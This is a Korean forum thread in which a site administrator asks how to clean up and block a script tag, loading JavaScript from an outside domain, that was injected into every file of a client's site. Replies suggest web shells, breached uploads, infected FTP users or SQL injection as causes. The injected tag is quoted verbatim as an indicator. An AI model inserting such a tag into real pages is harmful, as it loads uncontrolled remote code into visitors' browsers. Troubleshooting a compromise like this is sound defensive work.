이런 해킹 시도는 어떻게 막을 수 있나요 ? 정보
이런 해킹 시도는 어떻게 막을 수 있나요 ?
본문
고객사의 url로 얼마전 부터
모든 파일에
<script language=javascript src="http://www.baidu.com/ad.js?WSFPXJ"></script>
이런 스크립트들이 자동으로 들어가 있더군요..
조회결과 중국으로 나왔습니다.
220.181.111.147
저런 스크립트가 있는 경우 자동으로 삭제 시키거나
아이피로 접근하는 경우 막으려면 어떻게 할 수 있나요 ?
모든 파일에
<script language=javascript src="http://www.baidu.com/ad.js?WSFPXJ"></script>
이런 스크립트들이 자동으로 들어가 있더군요..
조회결과 중국으로 나왔습니다.
220.181.111.147
저런 스크립트가 있는 경우 자동으로 삭제 시키거나
아이피로 접근하는 경우 막으려면 어떻게 할 수 있나요 ?
댓글 전체
1. 웹셀
2. 업로드 폴더가 뚫렸다.
3. FTP 접속하는 사람들이 멀웨어 감염되어서 파일 변조.
2. 업로드 폴더가 뚫렸다.
3. FTP 접속하는 사람들이 멀웨어 감염되어서 파일 변조.
1. 검색해 봐야겠군요.
2. 업로드 폴더가 뚤린거 같기는 합니다.
3. FTP로 접속하는 누군가가 감염된건 맞는것 같습니다.
2. 업로드 폴더가 뚤린거 같기는 합니다.
3. FTP로 접속하는 누군가가 감염된건 맞는것 같습니다.
SQL 인젝션 공격으로 디비에 해당 코드가 포함되어 버렸을 수 있습니다.
이 경우 디비에서 삭제해야 합니다.
이 경우 디비에서 삭제해야 합니다.
저걸 디비에서 찾는것도 일입니다.
서버를 닫으시면 됩니다.
서버 닫는게 쉬운게 아니라서요...
그냥 간단하게 말하기는 쉽습니다.
그냥 간단하게 말하기는 쉽습니다.
소스상에 들어 있다면 웹로그와 ftp 로그를 살펴 변조된 파일 엑세스 경로를 잡으셔야합니다.
아 그런 방법도 있으시군요.
바이두 엄청 큰곳인데..해킹이라니참 --;
웹셀 찾아서 삭제하시고, 악성코드 검사, FTP아디 비번 변경하세욤.
웹셀 찾아서 삭제하시고, 악성코드 검사, FTP아디 비번 변경하세욤.
허락 없이 사이트에 소스 부분에 저 스크립트를 거의 모든 파일에 심어 놓았다면 해킹 아닐까요 ?
아무튼 지금 열심히 소스 전부를 찾아 고치는 중입니다.
파일이 워낙 많아서.. 이것도 힘든 일이네요.
아무튼 지금 열심히 소스 전부를 찾아 고치는 중입니다.
파일이 워낙 많아서.. 이것도 힘든 일이네요.
